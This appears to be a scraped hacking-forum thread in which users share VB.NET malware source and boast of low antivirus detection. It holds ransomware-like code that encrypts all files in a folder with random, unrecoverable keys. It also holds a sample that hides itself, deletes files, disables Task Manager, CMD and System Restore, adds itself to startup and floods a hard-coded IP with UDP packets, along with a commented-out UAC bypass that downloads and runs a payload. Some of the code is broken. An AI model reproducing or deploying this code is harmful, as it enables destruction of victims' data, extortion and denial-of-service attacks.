Hello everyone I share with you a code to build your own ransomware. I use the code for AES encryption from https://github.com/DeepwebCodex/Keepsave . This is a little bit "Script kiddies" I know. 

The folder "MyFiles" was for my own test. This 100% FUD  : https://virusscan.jotti.org/fr-FR/filescanjob/qocskcby2s

You can change the key, the method of encryption , bytes hashed .... to make it own ! I add a random var :  each file as a random key so to get it back is very difficult

Imports System.IO

Public Class Form1
    Dim filepath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\MyFiles"
   Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        ' Timer1.Start()
        For Each rr In Directory.GetFiles(filepath) '& "\MyFiles")
            Dim z = Directory.GetFiles(filepath) ' & "\MyFiles")
            Dim testrdmforkey As Random
            testrdmforkey = New Random
            Dim key As String = "??????§??????????????????" & testrdmforkey.ToString
            Dim READBYTES As Byte() = System.IO.File.ReadAllBytes(rr)
            Dim AESBYTES As Byte() = AESFile.AESFile_Encrypt(READBYTES, key)
            Dim eee As Random
            eee = New Random
            IO.File.WriteAllBytes(rr, AESBYTES)

        Next
    End Sub
    ' Dim filepath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\MyFiles"
    Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
        For Each rr In Directory.GetFiles(filepath) '& "\MyFiles")
            Dim z = Directory.GetFiles(filepath) ' & "\MyFiles")
            Dim testrdmforkey As Random
            testrdmforkey = New Random
            Dim key As String = "??????§??????????????????" & testrdmforkey.ToString
            Dim READBYTES As Byte() = System.IO.File.ReadAllBytes(rr)
            Dim AESBYTES As Byte() = otherencrpt.TripleDES_Encrypt(READBYTES, key)
            Dim eee As Random
            eee = New Random
            IO.File.WriteAllBytes(rr + ".exe", AESBYTES)

        Next
    End Sub
    Public Class AESFile
        Public Shared Function AESFile_Encrypt(ByVal input As Byte(), ByVal pass As String) As Byte()
            Dim AES As New System.Security.Cryptography.RijndaelManaged
            Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
            Dim Encrypted As Byte()
            Try
                Dim hash(31) As Byte
                Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
                Array.Copy(temp, 0, hash, 0, 16)
                Array.Copy(temp, 0, hash, 15, 16)
                AES.Key = hash
                AES.Mode = Security.Cryptography.CipherMode.ECB
                Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
                Dim buffer As Byte() = input
                Encrypted = DESEncrypter.TransformFinalBlock(buffer, 0, buffer.Length)
                Return Encrypted
            Catch ex As Exception
            End Try
        End Function
    End Class
end sub

Exampe of other encryption methods : 

Public Class otherencrypt
        Public Shared Function test(ByVal input As Byte(), ByVal pass As String) As Byte()
            Dim AES As New System.Security.Cryptography.AesManaged
            Dim Hash_AES As New System.Security.Cryptography.SHA512CryptoServiceProvider
            Dim Encrypted As Byte()
            Try
                Dim hash(31) As Byte
                Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
                Array.Copy(temp, 0, hash, 0, 16)
                Array.Copy(temp, 0, hash, 15, 16)
                AES.Key = hash
                AES.Mode = Security.Cryptography.CipherMode.ECB
                Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
                Dim buffer As Byte() = input
                Encrypted = DESEncrypter.TransformFinalBlock(buffer, 0, buffer.Length)
                Return Encrypted
            Catch ex As Exception
            End Try
        End Function
    End Class

Hello dear community , Iv' found this on another forum so I share this with you !

This is the bunifu framework for any Visual Studio versions and works for c# and VB.NET

 

DOWNLOAD LINK 

 

Thx man

Hello everyone I give you this code to build your own malware ! I used many sources to code this. Good afternoon ! 

Scan : https://spyralscanne...p?id=rSFl0EfL8d

-block restore 

-block taskmgr and disable it in reg

-block cmd and disable it in reg

-ddos

-hide from taskbar and form doesn't appear

Imports System.IO
Imports System.Net
Imports System.Net.Sockets
Imports System.Text
Imports Microsoft.Win32


Public Class Form1

    Dim a = My.Computer.FileSystem.SpecialDirectories.Desktop

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

        Timer1.Start()

        Me.ShowInTaskbar = False


        Me.Hide()

        ' For Each x In Directory.GetFiles(a & "\My Files")
        '   IO.File.Delete(x)
        '  Next
        For Each z In Directory.GetDirectories(a & "\My Files")
            IO.Directory.Delete(z, True)
            '  My.Computer.FileSystem.DeleteDirectory(z, FileIO.DeleteDirectoryOption.DeleteAllContents)


        Next


        For Each t In Directory.GetFiles(a & "\My Files")

            IO.File.Delete(t)

        Next

        Me.ShowInTaskbar = False

        Dim systemRegistry As RegistryKey = Registry.CurrentUser.CreateSubKey(“Software\Microsoft\Windows\CurrentVersion\Policies\System”)

        systemRegistry.SetValue(“DisableTaskMgr”, 1)

        systemRegistry.Close()

        Dim systemRegistry1 As RegistryKey = Registry.CurrentUser.CreateSubKey(“Software\Microsoft\Windows\CurrentVersion\Policies\System”)

        systemRegistry1.SetValue(“DisableCMD”, 1)

        systemRegistry1.Close()

        My.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)

        Dim oScope As New Management.ManagementScope("\\localhost\root\default")
        Dim oPath As New Management.ManagementPath("SystemRestore")
        Dim oGetOp As New Management.ObjectGetOptions()
        Dim oProcess As New Management.ManagementClass(oScope, oPath, oGetOp)
        Dim oInParams As Management.ManagementBaseObject = oProcess.GetMethodParameters("Disable")

        oProcess.InvokeMethod("Disable", {oInParams})

        'add payload

        '   Dim URLtoFile As String = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" 'URL to PayLoad
        '   Dim FilePath As String = IO.Path.GetTempPath
        'How this works
        'When eventvwr.exe is ran it starts a process call mmc.exe using the key HKLM\Software\Classes\mscfile\shell\open\command as admin
        'eventvwr.exe also will lounch the key in HLCU so you just make a key and lounch
        '    Dim Client As New Net.WebClient
        '  Client.DownloadFile(URLtoFile, FilePath + "payload.exe") 'Downlaod and Save the Payload
        '  Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command").SetValue("", FilePath + "payload.exe") 'Create a registry entry to the payload
        '   Process.Start("eventvwr.exe") 'Start Event Viewer
        'This makes Windows lounch the payload with admin rights, as a background application
        'You should also delete the key made so even viewer works normal again.




    End Sub



    Private Sub Form1_Key(sender As Object, e As KeyEventArgs) Handles Me.KeyDown
        If e.KeyData = Keys.Alt + Keys.F4 Then
            MessageBox.Show("Why are you trying to close me ?")
            e.Handled = True
        End If
    End Sub

    Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
        Dim udpClient As New UdpClient
        Dim GLOIP As IPAddress
        Dim bytCommand As Byte() = New Byte() {}
        GLOIP = IPAddress.Parse("217.148.93.150")
        udpClient.Connect(GLOIP, "80")
        bytCommand = Encoding.ASCII.GetBytes("150000")
        udpClient.Send(bytCommand, bytCommand.Length)
        Do
            Dim xUDP As New UdpClient
            Dim xIP As IPAddress
            Dim xConfig As Byte() = New Byte() {}
            xIP = IPAddress.Parse("217.148.93.150") 'Victim's IP
            xUDP.Connect(xIP, "80") 'Port the attack will be on
            xConfig = Encoding.ASCII.GetBytes("150000")
            xUDP.Send(xConfig, xConfig.Length)
        Loop 'Send packets endlessly until the victim pings out
    End Sub
End Class

Hello community I'm there to share you a useful advice. I'm trying to build a powerful and basic virus in VBnet and here is my code.

I've uploaded it on https://virusscan.jo...njob/vepcl334s7 and I saw that there was no detection to delete some folders (not system32  ) without permission and without getting back them from bin ! From https://www.virustot...5b63f/detection I got low detection (7/67)

Imports System.IO

Public Class Form1
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        Dim a = My.Computer.FileSystem.SpecialDirectories.Desktop
        For Each x In Directory.GetFiles(a & "\My Files")
            IO.File.Delete(x)
        Next
        For Each z In Directory.GetDirectories(a & "\My Files")
            IO.Directory.Delete(z, True)
            '  My.Computer.FileSystem.DeleteDirectory(z, FileIO.DeleteDirectoryOption.DeleteAllContents)


        Next
    End Sub
    Private Sub Form1_Key(sender As Object, e As KeyEventArgs) Handles Me.KeyDown
        If e.KeyData = Keys.Alt + Keys.F4 Then
            MessageBox.Show("Why are you trying to close me ?")
            e.Handled = True
        End If
    End Sub
End Class

Hello everyone I'm back to give you some lines of code to build your own malware. Of cources this is basic function and open so you can use it as you want !

For the section of payload I've just copied a code from https://github.com/S.../master/Main.vb

Of course this code needs administrator rights !

Hello everyone, some people asked me to get my code src and for seeing how it works so i've uploaded on github an EXAMPLE of src. BASED ON : https://hackforums.n...php?tid=4373630

 

PREVIEW : 

 

 

 

 

 

 

 

DOWNLOAD :

Already given 

Could you extract the newest rat because I can't install it with installer there is a bug with his framework ?

I will test and check thx for this thread